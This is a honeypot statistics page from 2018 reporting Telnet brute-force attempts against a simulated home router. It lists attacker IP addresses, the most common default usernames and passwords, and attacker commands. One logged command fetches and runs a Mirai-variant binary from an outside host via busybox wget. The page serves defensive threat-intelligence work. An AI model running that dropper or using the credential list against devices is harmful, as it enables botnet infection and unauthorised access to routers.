Honeypot Telnet

This page is updated daily. Last update: 2018-12-13 23:09:01 UTC

The followings Telnet blacklists (updated every day and in text format) contains IP addresses of hosts which tried to bruteforce into my honeypot located in Italy.
The honeypot simulates a home router with a weak password and the most usual commands.
Monthly Telnet login attempts

Attackers blacklists (IP address)

24 hours (txt)week (txt)year (txt)

Other informations

All passwords order by length (txt)
HTTP urls collected (txt)
Monthly connections (txt)

Statistics - 2018

Unique IP address26117
Unique username673
Unique password1586

Latest commands executed

Timestamp Command IP address AS AS Org Country
2018-12-13start123.121.176.574808CHINA169-BJ China Unicom ...CN
2018-12-13enable79.41.6.1473269ASN-IBSNAZ, ITIT
2018-12-13enable138.186.255.247263827Cooperativa Eléctrica y S...UNK
2018-12-13enable138.186.255.247263827Cooperativa Eléctrica y S...UNK
2018-12-13enable138.186.255.247263827Cooperativa Eléctrica y S...UNK
2018-12-13enable138.186.255.247263827Cooperativa Eléctrica y S...UNK
2018-12-13enable138.186.255.247263827Cooperativa Eléctrica y S...UNK
2018-12-13enable138.186.255.247263827Cooperativa Eléctrica y S...UNK
2018-12-13enable138.186.255.247263827Cooperativa Eléctrica y S...UNK
2018-12-13enable138.186.255.247263827Cooperativa Eléctrica y S...UNK

Top most sessions per distinct IP address - 2018

IP Address AS AS Org Country
185.12.179.208 (virustotal) (dnsbl-check)200185XANDMAIL-ASN, DEDE
205.185.117.65 (virustotal) (dnsbl-check)53667PONYNET FranTech Solutions, USUS
46.101.36.85 (virustotal) (dnsbl-check)14061DIGITALOCEAN-ASN DigitalOcean, LLC, USGB
94.177.248.67 (virustotal) (dnsbl-check)199883ARUBACLOUDLTD-ASN, GBUNK
188.166.119.55 (virustotal) (dnsbl-check)14061DIGITALOCEAN-ASN DigitalOcean, LLC, USNL
62.211.128.95 (virustotal) (dnsbl-check)3269ASN-IBSNAZ, ITIT
159.89.123.246 (virustotal) (dnsbl-check)14061DIGITALOCEAN-ASN DigitalOcean, LLC, USUNK
14.225.3.37 (virustotal) (dnsbl-check)45899VNPT-AS-VN VNPT Corp, VNUNK
178.62.71.53 (virustotal) (dnsbl-check)14061DIGITALOCEAN-ASN DigitalOcean, LLC, USGB
171.221.218.100 (virustotal) (dnsbl-check)4134CHINANET-BACKBONE No.31,J...CN

Login attempts last 10 days

Date Occurrences
2018-12-131675
2018-12-121507
2018-12-11916
2018-12-10773
2018-12-091404
2018-12-081547
2018-12-071214
2018-12-061900
2018-12-051973
2018-12-04956

Top username - 2018

Username
root
enable
shell
admin
default
guest
user
support
Administrator
supervisor

Top password - 2018

Password
system
sh
admin
default
12345
1234
password
user
vizxv
aquario

Top username/password - 2018

Username / Password
shell / sh
enable / system
admin / admin
root / vizxv
root / default
support / support
root / aquario
root / xc3511
user / user
root / anko

Top most commands - 2018

Command
enable
enable
linuxsh
/bin/busybox wget http://fun.r00ts.ninja/bins/arm -O - > scanHA; /bin/busybox chmod 777 scanHA; ./scanHA telnet.scanner; /bin/busybox SORA
sh
sh\r\nshell\r\nenable\r\nlinuxshell\r\nsystem
ping 127.0.0.1 -c1 && sh
start
enableêsystemê
PAYLOADZZZZ

See also

Detux - multiplatform Linux Sandbox
IoT bad password sheet by krebsonsecurity.com
Leaked Mirai source code for research/IoC development purposes